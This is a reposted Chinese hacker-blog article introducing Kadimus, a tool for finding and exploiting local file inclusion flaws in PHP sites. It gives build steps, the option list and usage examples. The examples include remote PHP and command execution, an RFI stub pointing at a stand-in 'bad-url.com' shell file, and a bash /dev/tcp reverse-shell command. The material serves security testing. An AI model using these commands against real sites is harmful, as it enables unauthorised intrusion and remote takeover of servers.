记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

本地文件包含(LFI)漏洞检测工具–Kadimus

2015-04-02 04:25
Kadimus是一个用于检测网站本地文件包含(LFI)漏洞的安全工具。
 
特性
 
检测所有URL参数
/var/log/auth.log RCE
/proc/self/environ RCE
php://input RCE
data://text RCE
源代码泄露检测
多线程扫描
HTTP命令执行漏洞
代理支持 (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
编译
 
安装libcurl:
 
CentOS/Fedora
 
# yum install libcurl-devel
Debian based
# apt-get install libcurl4-openssl-dev
安装libpcre:
 
CentOS/Fedora
 
# yum install libpcre-devel
Debian based
 
# apt-get install libpcre3-dev
安装libssh:
 
CentOS/Fedora
 
# yum install libssh-devel
基于Debian
 
# apt-get install libssh-dev
最后执行
 
$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
选项
 

-h, --help Display this help menu
Request:
-B, --cookie STRING Set custom HTTP Cookie header
-A, --user-agent STRING User-Agent to send to server
--connect-timeout SECONDS Maximum time allowed for connection
--retry-times NUMBER number of times to retry if connection fails
--proxy STRING Proxy to connect, syntax: protocol://hostname:port
Scanner:
-u, --url STRING Single URI to scan
-U, --url-list FILE File contains URIs to scan
-o, --output FILE File to save output results
--threads NUMBER Number of threads (2..1000)
Explotation:
-t, --target STRING Vulnerable Target to exploit
--injec-at STRING Parameter name to inject exploit
(only need with RCE data and source disclosure)
RCE:
-X, --rce-technique=TECH LFI to RCE technique to use
-C, --code STRING Custom PHP code to execute, with php brackets
-c, --cmd STRING Execute system command on vulnerable target system
-s, --shell Simple command shell interface through HTTP Request
-r, --reverse-shell Try spawn a reverse shell connection.
-l, --listen NUMBER port to listen
-b, --bind-shell Try connect to a bind-shell
-i, --connect-to STRING Ip/Hostname to connect
-p, --port NUMBER Port number to connect
--ssh-port NUMBER Set the SSH Port to try inject command (Default: 22)
--ssh-target STRING Set the SSH Host
RCE Available techniques
environ Try run PHP Code using /proc/self/environ
input Try run PHP Code using php://input
auth Try run PHP Code using /var/log/auth.log
data Try run PHP Code using data://text
Source Disclosure:
-G, --get-source Try get the source files using filter://
-f, --filename STRING Set filename to grab source [REQUIRED]
-O FILE Set output file (Default: stdout)

 

测试示例
 
扫描:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
获取文件源码:
 
./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg
 
执行php代码:
 
./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input
 
命令执行:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost
 
检查远程文件包含(RFI)漏洞:
 
/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
 
反弹shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
知识来源: www.2cto.com/Article/201504/386920.html

阅读:87106 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“本地文件包含(LFI)漏洞检测工具–Kadimus”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词